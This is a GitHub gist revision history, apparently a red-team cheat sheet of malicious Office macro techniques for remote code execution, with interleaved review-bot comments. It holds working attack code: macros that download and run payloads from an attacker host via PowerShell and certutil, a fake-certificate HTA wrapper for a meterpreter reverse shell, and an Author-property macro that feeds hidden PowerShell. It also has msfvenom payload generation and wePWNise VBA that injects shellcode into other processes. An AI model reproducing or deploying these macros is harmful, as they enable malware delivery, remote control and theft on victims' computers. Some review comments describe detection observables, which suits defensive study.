Revisions

  1. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 63 additions and 3 deletions.
    66 changes: 63 additions & 3 deletions Various-Macro-Based-RCEs.md
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,4 @@
    This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector.
    This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector.
    Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.


    @@ -16,6 +16,7 @@ List:
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell
    9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro
    10. Generate Base64-encoded HTA application to be decoded using `certutil`


    ---
    @@ -1078,7 +1079,7 @@ Final size of psh-cmd file: 6151 bytes

    Then we take that commands, base64-decode them and put into Author property. That's all.

    --
    ---

    **9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro**

    @@ -1106,4 +1107,63 @@ Microsoft InkPicture Control | InkPicture1_Painting
    System Monitor Control | SystemMonitor1_GotFocus
    . | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    . | many others...
    . | many others...


    ---

    **10. Generate Base64-encoded HTA application to be decoded using `certutil`**

    In this scenario, we are going to generate a file (like HTA application - which has relatively low detection rate by AVs and HIPSes) - then download it via *Powershell*-based Download Cradle, then pass it to `certutil` to make it Base64 decode that file and launch what has been decoded.

    **Step #1: Generate proper CRT file**

    To do this, we can use below script (modification is required to make `msfvenom` return proper payload):
    ```
    #!/bin/bash
    # --- PAYLOAD SETUP
    LHOST=192.168.56.101
    LPORT=4444
    PAYLOAD=windows/meterpreter/reverse_tcp
    # This file must have *.crt extension
    OUTPUT_FILE=/var/www/html/encoded.crt
    PAYLOAD_FILE=/tmp/test$RANDOM
    # ----
    msfvenom -f hta-psh -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $PAYLOAD_FILE
    echo -----BEGIN CERTIFICATE----- > $OUTPUT_FILE
    cat $PAYLOAD_FILE | base64 -w 0 >> $OUTPUT_FILE
    echo -----END CERTIFICATE----- >> $OUTPUT_FILE
    chown www-data:www-data $OUTPUT_FILE 2> /dev/null
    echo "Generated file: $OUTPUT_FILE"
    ```

    Then, having such file placed on our HTTP server - we are going to prepare Download-Cradle macro:

    ```
    Sub DownloadAndExec()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://<attacker>/encoded.crt", False
    xHttp.Send
    With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile "encoded.crt", 2
    End With
    Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")
    End Sub
    ```
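Review bot: neither half of this hunk checks for failure. In the bash script `msfvenom` can fail and the script still writes a header-only `.crt`; `set -e` after the shebang, quoted variables, and `base64 -w 0 "$PAYLOAD_FILE" >> "$OUTPUT_FILE"` instead of the `cat` pipe would make the errors visible instead of hiding them behind `2> /dev/null`. In `DownloadAndExec` a failed `xHttp.Send` still falls through to the `Shell` line, and the prose labels `Step #1` but never labels the macro as a second step. For a defender reading this section, the chain has clear observables exactly as written: an Office-hosted process launching `cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta`, and a `.crt` file on disk whose PEM `CERTIFICATE` header wraps something that is not a certificate. A rule on Office parent processes spawning `certutil` with `-decode` covers this variant regardless of what payload is inside the file.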
  2. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 4 additions and 4 deletions.
    8 changes: 4 additions & 4 deletions Various-Macro-Based-RCEs.md
    @@ -14,8 +14,8 @@ List:
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkPicture control, Painted event) autorun macro
    8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell
    9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro


    ---
    @@ -1041,7 +1041,7 @@ End Sub

    ---

    **8. Custom macro taking commands from Author property to feed them to StdIn of Powershell**
    **8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell**

    In this scenario, we set up a Macro that will take it's commands from Author property (or any other) and then pass it to *StdIn* of *Powershell* interpreter to avoid command logging in Event Logs of Windows:
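Review bot: this revision only reformats the heading, but the unchanged context line under it still reads `take it's commands`; it should be `its commands`, and `(or any other)` would be clearer as `(or any other document property)`, since that is what the macro reads.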

    @@ -1080,7 +1080,7 @@ Then we take that commands, base64-decode them and put into Author property. Tha

    --

    **9. ActiveX-based (InkPicture control, Painted event) autorun macro**
    **9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkPicture Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:
  3. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 6 additions and 6 deletions.
    12 changes: 6 additions & 6 deletions Various-Macro-Based-RCEs.md
    @@ -15,7 +15,7 @@ List:
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkEdit control) autorun macro
    9. ActiveX-based (InkPicture control, Painted event) autorun macro


    ---
    @@ -1080,13 +1080,13 @@ Then we take that commands, base64-decode them and put into Author property. Tha

    --

    **9. ActiveX-based (InkEdit control) autorun macro**
    **9. ActiveX-based (InkPicture control, Painted event) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkEdit Control*
    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkPicture Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:

    ```
    Sub InkEdit1_GotFocus()
    Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
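Review bot: in the new handler `Run = Shell(...)` assigns to `Run`, which is never declared or read; with `Option Explicit` this would not compile, and `Call Shell(...)` or a declared variable is the idiomatic form. The change is also worth a sentence in the prose, because it matters for anyone scanning documents: the trigger is now an ActiveX control event (`InkPicture1_Painted`) rather than one of the classic `AutoOpen`/`Document_Open`/`Workbook_Open` subroutines, so macro scanners or YARA rules that key only on those auto-exec names will miss it. Anything that parses a VBA project should treat the control event handler names collected in the table that follows as auto-execution triggers as well.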
    @@ -1100,8 +1100,8 @@ Microsoft Forms 2.0 Frame | Frame1_Layout
    Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    . | InkPicture1_Painting
    . | InkPicture1_Painted
    Microsoft InkPicture Control | InkPicture1_Painting
    . | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    . | SystemMonitor1_LostFocus
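Review bot: the rename leaves the table rows misaligned. After this change `InkPicture1_Painted` sits on a `.` placeholder row directly under `Microsoft InkEdit Control`, so it reads as an InkEdit event, while the control name `Microsoft InkPicture Control` has moved down to the `Painting` row. The control name belongs on the first of the three InkPicture rows (`Painted`), with `.` on the `Painting` and `Resize` rows.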
  4. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 4 additions and 4 deletions.
    8 changes: 4 additions & 4 deletions Various-Macro-Based-RCEs.md
    @@ -1101,9 +1101,9 @@ Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    - | InkPicture1_Painting
    - | InkPicture1_Resize
    . | InkPicture1_Painting
    . | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    - | SystemMonitor1_LostFocus
    . | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    - | many others...
    . | many others...
  5. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 18 additions and 1 deletion.
    19 changes: 18 additions & 1 deletion Various-Macro-Based-RCEs.md
    @@ -1089,4 +1089,21 @@ Then add such a control and double-click on it. This will pop up macro edit wind
    Sub InkEdit1_GotFocus()
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
    ```

    For other Macro-autorun related ActiveX controls and their methods - one can refer to the below resource:
    http://www.greyhathacker.net/?p=948

    ActiveX Control | Subroutine name
    --- | ---
    Microsoft Forms 2.0 Frame | Frame1_Layout
    Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    - | InkPicture1_Painting
    - | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    - | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    - | many others...
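Review bot: the hunk adds a second ``` line immediately after the closing fence of the macro, which opens an empty code block and swallows the following text in most markdown renderers; drop the duplicate fence. The greyhathacker link is a bare URL with no description; one line saying what the resource catalogues (ActiveX controls whose events fire without user interaction) would help the reader decide whether to follow it.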
  6. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 15 additions and 1 deletion.
    16 changes: 15 additions & 1 deletion Various-Macro-Based-RCEs.md
    @@ -15,6 +15,7 @@ List:
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkEdit control) autorun macro


    ---
    @@ -1075,4 +1076,17 @@ Final size of psh-cmd file: 6151 bytes
    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATABmAFgAWgBGAG8AQwBBADcAVgBXAGIAWQAvAGEATwBCAEQAKwB2 ...
    ```

    Then we take that commands, base64-decode them and put into Author property. That's all.
    Then we take that commands, base64-decode them and put into Author property. That's all.

    --

    **9. ActiveX-based (InkEdit control) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkEdit Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:

    ```
    Sub InkEdit1_GotFocus()
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
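Review bot: the `--` separator added before the new section is not a markdown horizontal rule (three characters are required), so it renders as literal text; the earlier sections use `---`. Wording in the added prose: `Then we take that commands` should be `those commands`, `This will pop up macro edit window` needs `the`, and `one of the above stated macros` reads better as `one of the macros stated above`.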
  7. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 38 additions and 0 deletions.
    38 changes: 38 additions & 0 deletions Various-Macro-Based-RCEs.md
    @@ -14,6 +14,7 @@ List:
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell


    ---
    @@ -1038,3 +1039,40 @@ End Sub
    ```

    ---

    **8. Custom macro taking commands from Author property to feed them to StdIn of Powershell**

    In this scenario, we set up a Macro that will take it's commands from Author property (or any other) and then pass it to *StdIn* of *Powershell* interpreter to avoid command logging in Event Logs of Windows:

    **Step #1:**
    Put the following macro (or modify it in some way)

    ```
    Private Sub Workbook_Open()
    Dim author As String
    author = ActiveWorkbook.BuiltinDocumentProperties("Author")
    Dim ws As Object
    Set ws = CreateObject("WScript.Shell")
    With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
    .StdIn.WriteLine author
    .StdIn.WriteBlankLines 1
    .Terminate
    End With
    End Sub
    ```

    Then place some not Base64 encoded Powershell commands in Author property of document's. Macro could be easily generated for instance using **msfvenom**:

    ```
    work|19:10|~ # msfvenom -f psh-cmd LHOST=192.168.56.101 LPORT=4444
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 333 bytes
    Final size of psh-cmd file: 6151 bytes
    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATABmAFgAWgBGAG8AQwBBADcAVgBXAGIAWQAvAGEATwBCAEQAKwB2 ...
    ```

    Then we take that commands, base64-decode them and put into Author property. That's all.
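Review bot: the intro's claim that feeding commands over `StdIn` is done `to avoid command logging in Event Logs of Windows` is overstated and should be qualified. What it avoids is the command text appearing in the process-creation command line (a 4688 or Sysmon process-creation event sees only `powershell.exe -nop -WindowStyle hidden -Command -`); PowerShell script block logging (Event ID 4104) records script blocks as they execute regardless of how they were delivered, so on a host with that logging enabled the commands are still logged. Smaller points: `take it's commands` should be `its`, and `some not Base64 encoded Powershell commands` should be `some non-Base64-encoded PowerShell commands`, which also matches the last line, where the msfvenom output is base64-decoded before being placed in the property. Worth stating for anyone analysing such a document: because the macro reads `BuiltinDocumentProperties("Author")`, the command lives in the document's metadata rather than in the VBA project, so analysis that only extracts the macro source sees a harmless-looking `Workbook_Open` and misses the payload; the metadata of a macro-bearing document should be inspected alongside the VBA.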
  8. @mgeeky mgeeky revised this gist Aug 23, 2017. 1 changed file with 477 additions and 0 deletions.
    477 changes: 477 additions & 0 deletions Various-Macro-Based-RCEs.md
    @@ -13,6 +13,7 @@ List:
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET


    ---
    @@ -560,4 +561,480 @@ And that's all.



    ---


    **7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET**

    That's something huge actually. The `wePWNise` tool by **MWRLabs** is a tool that embeds previously generated x86 and x64 payloads right into VBS script that itself is capable of enumerating (in the runtime) Software Restriction Policies and EMET policies, finding weak spots and then bypassing those. Everything goes automatically right after executing the macro. This functionality makes the `wePWNise` code quite robust under various enviroment restrictions.

    In order to generate such Macro we have to firstly generate **two** payloads for both: **x86** and **x64** architecture's for instance via `msfvenom`:

    ```
    work|02:47|~/ # msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 -f raw -o /tmp/methttps1.raw
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 408 bytes
    Saved as: /tmp/methttps1.raw
    work|02:48|~/ # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 -f raw -o /tmp/methttps1x64.raw
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x64 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 673 bytes
    Saved as: /tmp/methttps1x64.raw
    ```

    Having those two, we can proceed to actual VBA code generation with command:

    ```
    work|02:48|~/ # python wepwnise.py -i86 /tmp/methttps1.raw -i64 /tmp/methttps1x64.raw --out /tmp/wepwnise.txt
    ```

    Which will result in the following Macro code:

    ```
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF
    Private Const MEM_COMMIT = &H1000
    Private Const MEM_RELEASE = &H8000
    Private Const PAGE_READWRITE = &H40
    Private Const HKEY_LOCAL_MACHINE = &H80000002
    Private Const PROCESSOR_ARCHITECTURE_AMD64 = 9
    Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
    End Type
    Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
    End Type
    #If VBA7 Then 'x64 office
    Private Declare PtrSafe Function bodyslam Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
    Private Declare PtrSafe Function watergun Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function leechseed Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As LongPtr
    Private Declare PtrSafe Function thunderbolt Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As LongPtr
    Private Declare PtrSafe Function flamethrower Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr
    Private Declare PtrSafe Sub pokedex Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
    Private Declare PtrSafe Function cosmicpower Lib "kernel32" Alias "GetCurrentProcess" () As LongPtr
    Private Declare PtrSafe Function rarecandy Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As LongPtr, ByRef Wow64Process As Boolean) As Boolean
    Private Declare PtrSafe Function dragonascent Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    dwPageSize As Long
    lpMinimumApplicationAddress As LongPtr
    lpMaximumApplicationAddress As LongPtr
    dwActiveProcessorMask As LongPtr
    dwNumberOrfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Integer
    wProcessorRevision As Integer
    End Type
    #Else
    Private Declare Function bodyslam Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
    Private Declare Function watergun Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function leechseed Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function thunderbolt Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare Function flamethrower Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
    Private Declare Sub pokedex Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
    Private Declare Function cosmicpower Lib "kernel32" Alias "GetCurrentProcess" () As Long
    Private Declare Function rarecandy Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As Long, ByRef Wow64Process As Boolean) As Boolean
    Private Declare Function dragonascent Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    dwPageSize As Long
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOrfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    dwReserved As Long
    End Type
    #End If
    Dim inject64 As Boolean
    Public Function IsOffice64Bit() As Boolean
    Dim lpSystemInfo As SYSTEM_INFO
    Call pokedex(lpSystemInfo)
    If lpSystemInfo.wProcessorArchitecture = PROCESSOR_ARCHITECTURE_AMD64 Then
    Call rarecandy(cosmicpower(), IsOffice64Bit)
    IsOffice64Bit = Not IsOffice64Bit
    End If
    End Function
    Public Function IsWow64(handle As Long) As Boolean
    Call rarecandy(handle, meh)
    IsWow64 = Not meh
    End Function
    Public Function DieTotal()
    MsgBox "This document will begin decrypting, please allow up to 5 minutes"
    End Function
    Public Function TrailingSlash(strFolder As String) As String
    If Len(strFolder) > 0 Then
    If Right(strFolder, 1) = "\" Then
    TrailingSlash = strFolder
    Else
    TrailingSlash = strFolder & "\"
    End If
    End If
    End Function
    Public Function RecursiveDir(colFiles As Collection, strFolder As String, strFileSpec As String, bIncludeSubfolders As Boolean)
    Dim strTemp As String
    Dim colFolders As New Collection
    Dim vFolderName As Variant
    strFolder = TrailingSlash(strFolder)
    On Error Resume Next
    strTemp = Dir(strFolder & strFileSpec)
    Do While strTemp <> vbNullString
    colFiles.Add strFolder & strTemp
    strTemp = Dir
    Loop
    If bIncludeSubfolders Then
    strTemp = Dir(strFolder, vbDirectory)
    Do While strTemp <> vbNullString
    If (strTemp <> ".") And (strTemp <> "..") Then
    If (GetAttr(strFolder & strTemp) And vbDirectory) <> 0 Then
    colFolders.Add strTemp
    End If
    End If
    strTemp = Dir
    Loop
    For Each vFolderName In colFolders
    Call RecursiveDir(colFiles, strFolder & vFolderName, strFileSpec, True)
    Next vFolderName
    End If
    End Function
    Public Function getList() As String()
    Dim myList As String
    myList = ""
    myList = myList & "ping.exe /t 127.0.0.1" & ","
    myList = myList & "C:\Program Files (x86)\EMET 5.5\EMET_Agent.exe" & ","
    myList = myList & "hh.exe /?" & ","
    myList = myList & "regedit.exe" & ","
    myList = myList & "cmd.exe /K" & ","
    myList = myList & "xpsrchvw.exe" & ","
    myList = myList & "xcopy.exe * /w" & ","
    myList = myList & "wscript.exe" & ","
    myList = myList & "netstat.exe -aneft 100" & ","
    myList = myList & "netsh.exe" & ","
    myList = myList & "winver.exe" & ","
    myList = myList & "windowsanytimeupgradeui.exe" & ","
    myList = myList & "wfs.exe" & ","
    myList = myList & "waitfor.exe statusready" & ","
    myList = myList & "verifier.exe" & ","
    myList = myList & "timeout.exe -1" & ","
    myList = myList & "soundrecorder.exe" & ","
    myList = myList & "sndvol.exe" & ","
    myList = myList & "rasphone.exe" & ","
    myList = myList & "nslookup.exe" & ","
    myList = myList & "mstsc.exe" & ","
    myList = myList & "wmic.exe" & ","
    myList = myList & "C:\\windows\\system32\\speech\\speechux\\speechuxtutorial.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\Ping.exe -t 127.0.0.1" & ","
    myList = myList & "wmic.exe" & ","
    myList = myList & "C:\Windows\bfsvc.exe" & ","
    myList = myList & "C:\Windows\explorer.exe" & ","
    myList = myList & "C:\Windows\fveupdate.exe" & ","
    myList = myList & "C:\Windows\HelpPane.exe" & ","
    ' Cut for brevity
    [...]
    myList = myList & "C:\Windows\System32\wbem\wbemtest.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WinMgmt.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WMIADAP.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WmiApSrv.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WMIC.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WmiPrvSE.exe" & ","
    myList = myList & "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & ","
    myList = myList & "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\AdapterTroubleshooter.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\ARP.EXE" & ","
    myList = myList & "C:\Windows\SysWOW64\at.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\AtBroker.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\attrib.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\auditpol.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\autochk.exe" & ","
    ' Cut for brevity
    [...]
    myList = myList & "C:\Windows\SysWOW64\InstallShield\setup.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\InstallShield\_isdel.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\mighost.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\MigSetup.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\migwiz.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\PostMig.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\mofcomp.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WinMgmt.exe" & ","
